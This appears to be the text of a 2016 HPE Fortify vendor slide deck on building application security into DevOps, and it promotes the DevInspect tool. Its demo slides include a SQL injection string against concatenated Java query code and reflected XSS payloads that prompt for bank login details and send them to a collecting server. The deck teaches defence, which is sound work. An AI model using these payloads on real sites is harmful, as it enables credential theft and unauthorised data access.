Discover Best of Show 2016 2. - 3. März 2016, Düsseldorf
2. - 3. März 2016 Softwaresicherheit im Zeitalter von DevOps Lucas von Stockhausen Regional Product Manager Fortify
The case for Application Security I am secure I have a firewall 3
Malware over the years HPE Security Research Cyber Risk Report 2016 4
There is a breach in the headlines almost every day http://www.informationisbeautiful.net/visualizations/worlds-biggest-data-breaches-hacks/ 5
Casualties Accidents Aircraft Accidents over the years 3000 Aircraft Accidents 140 2500 120 2000 100 1500 80 60 1000 40 500 20 0 0 Year Casualties Accidents Number of accidents and fatalities per year (excluding sabotage, shoot-downs) https://aviation-safety.net/statistics/period/ 6
The increase in attacks is constant Ponemon Cost of Cyber Crime Study 2012 Ponemon Cost of Cyber Crime Study 2015 7
Existing network and perimeter based security is insufficient 1 2 3 4 5 6 7 8 84% of breaches exploit vulnerabilities in the application layer Yet the ratio of spending between perimeter security and application security is 23-to-1 - Gartner Maverick Research: Stop Protecting Your Apps; It s Time for Apps to Protect Themselves (2014)
Basic hacking example 9
Live example SQL Injection Telnet Cross site scripting 10
SQL-Injection String username = ctx.getauthenticatedusername(); String itemname = request.getparameter("itemname"); String query = "SELECT * FROM items WHERE owner = '" + username + "' AND itemname = '" + itemname + "'"; ResultSet rs = stmt.execute(query); String username = ctx.getauthenticatedusername(); String itemname = request.getparameter("itemname"); String query = "SELECT * FROM items WHERE owner = '" + lucas+ "' AND itemname = '" + "x' or 1=1; -- + "'"; ResultSet rs = stmt.execute(query); username = lucas itemname = "x' or 1=1; -- SELECT * FROM items WHERE owner = 'lucas' AND itemname = 'x' or 1=1; -- '"
SQL-Injection 12
Telnet session 13
XSS Cross Site Scripting 14
Real word payloads 15
Real-world payloads So, what is XSS truly capable off What can you execute?
Real-world payloads Simple answer: JavaScript
Real-world payloads Simple answer: JavaScript Wait. That weak-sauce web scripting language that you had to learn in college back in the day? How bad could it be?
Real-world payloads Javascript is a full-featured programming language Object-oriented C-like syntax Extremely powerful Native in every browser
Real-world payloads In sum, being able to run JavaScript on a victim s browser has a LOT of potential
Real-world payloads In sum, being able to run JavaScript on a victim s browser has a LOT of potential Let s take a look at a possible attack and how to build it up Let s go to http://legacy.webapsecurity.com
Real-world payloads http://legacy.webapsecurity.com
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>alert("buh");</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); alert("username="%2b%0ausername%2b%0a" and password="%2b%0apassword);</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/images/top.jpg" alt=""'); document.write('<br>invalid Login: '%2B%0Ausername);</script>
Real-world payloads http://legacy.webappsecurity.com/banklogin.asp?err=<script>username=prompt('please enter your username',' '); password=prompt('please enter your password',' '); document.write('<img src="http://localhost:8080/splc/listmyitems.do?username='%2busername%2b'%26password='%2bpasswo rd%2b'">'); document.write('<br>invalid Login: '%2Busername);</script>
Real-world payloads There are many other possibilities and Opportunities Remember, if these are the easy options, imagine what others are capable of!
Real-world payloads There are a number of ways to launch the actual attack Stored XSS Reflected XSS Owning a page that a victim visits Remember, navigating to a page is permission to run what s on that page Consider visiting a webpage is an act of significant trust
What is the reason 29
Today s approach > expensive, reactive 1 Somebody builds insecure software IT deploys the insecure software We convince & pay the developer to fix it 2 4 We are breached or pay someone to tell us our code is insecure 3
Cost Why it doesn t work 30x more costly to secure in production 30X 10X 15X 5X 2X Requirements Coding Integration/ component testing System testing Production After an application is released into Production, it costs 30x more than during design. Source: NIST
The right approach > systematic, proactive Embed security into SDLC development process 1 2 In-house Outsourced Commercial Open source Leverage Security Gate to validate resiliency of internal or external code before Production 3 Improve SDLC policies Monitor and protect software running in Production This is application security
The help Static Application Security Testing (SAST) Dynamic Application Security Testing (DAST) Interactive Application Security Testing (IAST) Runtime Application Self Protection (RASP)
Example Process for Analysis Development Teams Security AWB 2. Audit Defect Tracking System Monitor CM Project Security Lead Source Code Repository(s) CISO 3. Assign CM Central Build Server(s) Build Tool Fortify SCA 5. Validate AWB WebInspect Development Manager 1. Identify Security Auditor IDE 4. Fix Fortify CM Fortify SSC Server 6. Report Developer
Movement to DevOps Business leaders have Agility at the top of their priorities as they prepare for the fast-paced, very competitive future. Processes need to be further streamlined, minimize resource consumption and reduce time-to-market. Security context Development organizations can save time and money by building in security early in the development process 35
Challenges in a DevOps environment Developers are not security experts Security testing is an afterthought Pressure to push out software into production leaves no time for security Security assessment take up resources 36
Introducing HPE Security DevInspect Bringing application security closer to the Developer AppSec solution created for developers to identify and remediate security vulnerabilities in source code within the native developers environment. Brings market-leading AppSec technologies directly to the developer, ensuring secure code as your shift left in your dev process. Real-time, instant security results as the developer is writing code. Enable developers to assess for security weaknesses. 37
End to End Application Security Static Dynamic Runtime On-premise DevInspect App Defender On-demand Fortify on Demand App Defender Application Development 38
HPE Security DevInspect: Static Code Analysis Real-time lightweight analysis of the source code Dynamic Analysis Runtime Analysis Documentation 39
What s included in DevInspect 1.0? Static Code Analysis Real-time lightweight analysis of the source code Integration for Fortify Software Security Center (SSC) Integration for Fortify on Demand (FoD) Documentation 40
Key Benefits DESIGNED FOR THE DEVELOPER Fully integrated into the native development environment (IDE) Supports the DevOps toolchain Providing thorough and robust software security analysis of an application INSTANT RESULTS (Fast) Inline analysis of the source code as the developer types providing immediate feedback Out of the box results no configuration required CONTINUOUS FEEDBACK Continuously updated security findings as code is written Tracks findings and guided developers toward remediation 41
Example Process for Static Analysis in DevOps Development Teams Security AWB Defect Tracking System Monitor CM Project Security Lead Source Code Repository(s) CISO CM Central Build Server(s) Build Tool Fortify SCA 4. Validate AWB WebInspect Development Manager 1. DevInspect IDE 2. Checkin 3. Milestone Scan Fortify CM Fortify SSC Server Security Auditor 5. Report Developer
Security Assistant Real-time lightweight analysis of the source code Fortify menu for additional options Fortify Icon added to icon bar Detailed remediation advice Vulnerable line of code highlighted & Tool tip for additional information All issues detected in the project 43
Thank you lvonstockhausen@hpe.com 44